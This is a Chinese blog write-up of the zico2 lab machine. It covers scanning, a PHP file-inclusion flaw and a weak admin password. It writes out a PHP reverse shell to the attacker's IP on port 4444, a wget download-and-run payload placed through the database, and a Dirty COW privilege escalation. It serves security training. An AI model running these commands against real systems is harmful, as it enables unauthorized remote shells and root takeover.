zico2---文件包含漏洞

最新推荐文章于 2023-07-02 22:11:52 发布
最新推荐文章于 2023-07-02 22:11:52 发布
阅读量354 收藏 2
点赞数 1
分类专栏: kali 漏洞复现 文章标签: linux 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45671944/article/details/117880438
版权

漏洞复现过程

信息收集

目标靶机:zico2
主机发现
端口扫描
指纹探测
目录扫描

漏洞发现

漏洞利用

提权
总结

信息收集:一:主机发现
netdiscover -i eth0 -r 192.168.10.0/24
对同网段下的主机进行发现(也可使用namp -sV)
扫出目标IP为192.168.10.136
在这里插入图片描述(1为物理机的虚拟网卡,2为网关,254为边界)
二:端口扫描
masscan --rate =100000 --ports 0-65535 192.168.10.136
在这里插入图片描述
可使用 namp -sv -T4 -O -p 22,80 192.168.10.136 对端口进行扫描
三:指纹获取
whatweb http://192.168.10.136 可以查看主机的部分信息
四:目录扫描
dirb http://192.168.10.136 可以扫描主机目录文件
在这里插入图片描述
漏洞发现:
浏览器访问主机IP:在这里插入图片描述
使用burp suite抓包发现:存在文件包含漏洞在这里插入图片描述**漏洞利用:**访问网页下的bdadmin目录:

在这里插入图片描述
使用弱口令攻击发现,登录口令为:admin
在kali的HTML目录下创建shell脚本:
shell.txt:

<?php  $sock=fsockopen("192.168.10.128",4444);exec("/bin/sh -i <&3 >&3 2>&3");?>

在这里插入图片描述
在此创建数据库,并将shell.php:<?php system("wget 192.168.10.128/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>写入(此处代码可将攻击者写好的shell.txt 下载并写入到靶机的shell.php 目录下)

访问创建好的数据库:在这里插入图片描述在KALI开启apache服务,并监听4444端口,发现可以进行登录访问

提权:可以使用python -c 'import pty;pty.spawn("/bin/bash")'创建终端
下一步可以使用脏牛提权:可以访问TMP目录,进行写操作,将dirty.c文件写入到tmp目录下
使用gcc -pthread dirty.c -o hacker -lcrypt编译dirty.c文件为hacker程序,在这里插入图片描述
并./hacher 运行此程序
su firefort 进行用户切换,至此,提权完成在这里插入图片描述
访问root目录下的flag文件,拿到flag在这里插入图片描述总结:文件包含漏洞在使用时,需与攻击者建立连接,并将攻击者的代码下载下来,在靶机上运行,可以利用此过程进行shell获取

jrdh1209
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
靶机渗透测试实战(六)——Zico2渗透实战
橘子女侠
05-11 6730
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
靶机渗透(五)Zico2
qq_42180996的博客
04-26 2758
靶机Zico2 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) (二)Web渗透 1.浏览web网页(80端口) 2.尝试利用文件包含漏洞 3.网站指纹信息扫描(whatweb) 4.目录扫描(dirb) 5.访问/dbadmin目录 6.查找数据库...
靶机精讲:ZICO_2 靶机 writeup
最新发布
weixin_72368277的博客
07-02 182
zico_2有趣的斯口子,确定吧来看看?
文件包含漏洞zico2靶机实战
随 风
06-28 289
一、原理 1、文件包含4 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用过程称为文件包含; 2、文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞; 二、文件包含漏洞常见函数 (1)require:找不到被包含的文件,报错,并且停止运行脚本; (2)include:找不到被包含的文件,只会报错; (3)require_once:与require类似,区别
入门靶机渗透之zico2
Yaphst的博客
03-08 5951
靶场介绍 靶机下载地址:点击进入下载界面 下载.ova文件,在VMware中导入该虚拟机,导入完成后配置网卡,确保与自己的攻击机在同一网段,然后开启虚拟机。 Zico 正在尝试建立他的网站,但在选择要使用的 CMS 时遇到了一些麻烦。 在尝试了一些流行的CMS之后,他决定建立自己的。 这是个好主意吗? 目标:拿到root权限,获取flag 信息收集 打开kali,查看kali的IP地址 目标靶机与kali在同一网段,使用nmap对所在网段进行扫描,探测主机 判断192.168.115.134是靶机的
VMware的Zico2虚拟机
05-12
Zico2虚拟机的文件包括`.ova`和`.vmxf`。`.ova`文件是一种开放虚拟化格式(OVF)档案,它是VMware和其他虚拟化解决方案通用的容器格式,用于存储和传输虚拟机的配置信息和磁盘映像。`.ova`文件包含虚拟机的所有必要...
Zico-Shop.xmind
11-25
Zico-Shop.xmind
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
Zoomla!逐浪CMS2 x3.9.6.zip
07-16
5、升级:zico升级到v1.5,增加医疗行业图标。 6、修复:内容列表--如节点未允许内容页生成,则不会显示生成按钮 7、改进:内容发布过渡页效果 8、修复:内容列表--生成Html BUG,生成发布时,过滤未审核内容 9、增加:...
Zoomla!逐浪CMS 3.9.6.rar
05-24
逐浪CMS作为国内最大的.net平台CMS内容系统研发厂商,始终致力于为用户提供最优秀的网站内核与软件,并强调完全开放、绝不内嵌后门(包括强制升级提示与版权LOGO)、只专注于研发,多年来取得了包括CSDN在内的高端开发...
靶场渗透(五)——zico2渗透
Ramona的博客
08-10 584
测试环境 靶机:cizo2打开虚拟机后设为nat模式 攻击机:kali,windows10 信息收集 • nmap扫描ip,端口和服务,根据扫描结果可得 ip:192.168.111.138 端口及服务:22 ssh;80 http;111 渗透测试 • 访问网站,查看源码也没发现有价值的线索,爆破目录发现了敏感目录dbadmin且存在遍历漏洞 • 访问test_d...
渗透靶机测试之zico2
hclimg的博客
07-16 619
1.使用nmap扫描,发现主机地址 发现zico2主机地址:192.168.232.130 nmap的-sn参数表示只进行主机发现,不进行端口扫描,然后在浏览器中输入地址,得到首页网站 2.使用nmap进行详细的扫描 -sT -sC -sV 进行系统版本检测 -p- 扫描常用端口 3.使用dirb进行目录浏览 ![在这里插入图片描述](https://img-blog.csdnimg.cn/...
靶机zico2练习:数据库插入反弹语句获取shell,脏牛提权,清除痕迹,留后门
7Riven's blog
01-29 920
1.主机发现 2.端口扫描 3.目录扫描 4.端口访问 尝试一下,含有文件包含漏洞 5.访问扫描出来的目录 发现登录端口,需要输入密码 尝试弱口令admin登录成功 信息查询,发现用户名、密码 md5解密试试,root用户密码为:34kroot34 zico用户密码为:zico2215@ 由于存在ssh服务端口,尝试连接 ...
vulnhub渗透系列之zico2(内含zip提权和脏牛提权)
来到了学渣的博客
02-02 2162
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 我这个靶机总结了两种反弹shell和两种提权的方法(python反shell和zip提权、php反shell和 脏牛提权)并且有我错误的经验。希望能帮助到你们 实验过程总结 1.探测发现开放端口22、80、111端口,发现页面存在文件包含漏洞,dirb目...
靶机渗透测试(zico2: 1)
@小张小张的博客
11-12 726
靶机渗透测试(): Vulnhub靶机 h 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(====) 目标:Close your eyes and feel the heat of being in the middle of the Chakravyuh. The Epic Battle formation that is said to uncrackable. Can you crack the Uncrackable? Does it
Vulnhub靶机渗透之zico2
realmels的博客
07-04 599
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub之Me and My Girlfriend XSS漏洞 文件上传漏洞 文件上传绕过.
网安学习Day23-文件包含漏洞
weixin_44770698的博客
05-25 1011
文件包含的知识点框架如下: 文件包含的原理 大多数的Web语言都可以使用文件包含操作,其中PHP语言所提供的文件包含功能太强大、太灵活,所以文件包含漏洞经常出现在PHP语言中,但就是因为这种灵活性,从而导致客户端可以调用一个恶意文件,造成了文件包含漏洞。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞。 攻击者会指定一个“
文件包含漏洞
weixin_63231007的博客
03-22 1087
定义: 在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。 危险函数: include() , include_once() , require() , require_once(). 解题思路: 本地文件包含: 直接读取目标机上的Flag文件. 远程文件包含:指定第三方服务器上可运行的PHP木马,拿到webshell,查看Flag文件. 判断本地文件包含与远程文件包含方法: ...
文件包含漏洞详解
热门推荐
m0_55854679的博客
03-12 1万+
文章目录File Inclusion(文件包含)概述漏洞产生原因漏洞特点注小知识文件包含函数includerequireinclude_oncerequire_once文件包含示例pikachu靶场本地文件包含漏洞演示pikachu靶场远程文件包含漏洞演示文件包含漏洞的利用PHP伪协议(文件包含漏洞常用的利用方法)文件包含漏洞的防范措施phpMyadmin靶场练习 File Inclusion(文件包含)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件
Zico2靶机渗透测试实战指南
这个Zico2渗透实战教程涵盖了渗透测试的基本流程,包括环境配置、信息收集和漏洞利用,为学习者提供了一个实践渗透测试技能的平台。通过这种方式,安全专业人员可以提高自己的技能,同时理解如何在现实世界中保护...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值